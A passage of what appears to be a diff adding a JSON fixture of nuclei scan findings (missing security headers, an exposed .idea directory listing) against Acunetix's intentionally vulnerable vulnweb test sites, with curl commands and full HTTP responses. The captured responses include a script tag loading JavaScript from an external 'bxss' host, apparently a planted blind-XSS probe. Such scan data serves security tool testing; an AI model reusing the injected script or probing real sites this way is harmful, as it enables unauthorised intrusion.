Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:13.938Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 491, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:14.097Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 492, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:14.233Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 493, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:14.377Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 494, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:14.518Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 495, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:14.664Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 496, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:14.821Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + 